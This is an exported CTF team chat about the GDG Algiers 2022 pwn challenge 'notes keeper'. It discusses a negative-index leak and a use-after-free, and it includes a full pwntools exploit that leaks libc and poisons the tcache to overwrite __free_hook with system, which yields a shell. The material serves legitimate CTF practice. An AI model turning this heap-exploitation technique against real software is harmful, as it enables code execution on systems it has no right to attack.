Project Sekai - ✅-pwn-notes-keeper

Project Sekai

🔒 GDG Algiers CTF 2022 / ✅-pwn-notes-keeper

Notes keeper - 500 points

Category: Pwn Description: > A friend of mine told me that he uses a strong

notes keeper to write his diaries there. Can you prove him wrong and pwn it?

Author : Scorpion197 Files:

https://ctf.gdgalgiers.com/files/225336dedb7405d883d1315d5f833449/notes_keeper.zip?token=eyJ1c2VyX2lkIjo0MzksInRlYW1faWQiOjE3NSwiZmlsZV9pZCI6NTZ9.Y0BpWQ.XF-Jux_u5_-sXBN2JUG1QG31ZlM

Tags: No tags.

Sutx pinned a message to this channel. 10/07/2022 11:00 AM

@god lives in my skin wants to collaborate

if anyone decides to work on this at a later point, the view note function allows us to read from a negative index

14:55

you can leak libc via the io stderr pointer at offset -2, and leak binary base via global_dtors_aux at offset -92

14:57

unlimited frees at any arbitrary index in the remove_note function and a uaf read in the view_note function

@Johnathan Huu Tri wants to collaborate

also we have UAF

1

got this msg from lemon

we have a UAF but we don't have and edit() function so somehow we need to overlap the chuck
i tried to alloc 3 chunks same size, free 0 , alloc. 
i got 2 pointers but i still don't know how to write

ok I solved it

oh

19:57

gg

cannot overlap chunk

19:57

I use another trick

19:58

to overlap chunk, we need a chunk that can go unsorted bin

19:58

I will submit when I finished my script

19:58

so let this chall for me

ok

alr pls send script when finished im lost lmao

sure

1

Johnathan Huu Tri

used /ctf

✅ Well done, challenge solved!

#!/usr/bin/env python3

from pwn import *

exe = ELF("./chall_patched", checksec=False)
libc = ELF("./libc.so.6", checksec=False)
ld = ELF("./ld-2.29.so", checksec=False)

context.binary = exe

def conn():
    if args.LOCAL:
        r = process([exe.path])
        if args.DEBUG:
            gdb.attach(r)
    else:
        r = remote("pwn.chal.ctf.gdgalgiers.com", 1405)

    return r

sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)

def add(size, content):
    sla(b'option: ', b'1')
    sla(b'Size: ', str(size).encode())
    sla(b'content: ', content)

def remove(idx):
    sla(b'option: ', b'2')
    sla(b'index: ', str(idx).encode())

def edit():
    sla(b'option: ', b'3')

def view(idx):
    sla(b'option: ', b'4')
    sla(b'Index: ', str(idx).encode())

p = conn()

##################################
### Stage 1: Leak libc address ###
##################################
view(-2)
p.recvuntil(b'located at: ')
libc_leak = int(p.recv(14), 16)
libc.address = libc_leak - 0x1e5680
log.info(hex(libc.address))

##############################
### Stage 2: Tcache attack ###
##############################
# Because when we free a chunk within tcache size
# the program just check if size is valid, don't check if
# Idea: Free the same chunk with different sizes
add(0x18, b'0'*0x8)
add(0x18, b'1'*0x8)
add(0x118, b'2'*0x8)

remove(2)
remove(1)
# GDB()
add(0x18, b'0'*0x18)
remove(0)
remove(2)

add(0x118, p64(libc.sym['__free_hook']))
add(0x18, b'/bin/sh')
add(0x18, p64(libc.sym['system']))

remove(1)

p.interactive()

sick thanks, i was way over complicating things

hehe

1

Exported 23 message(s)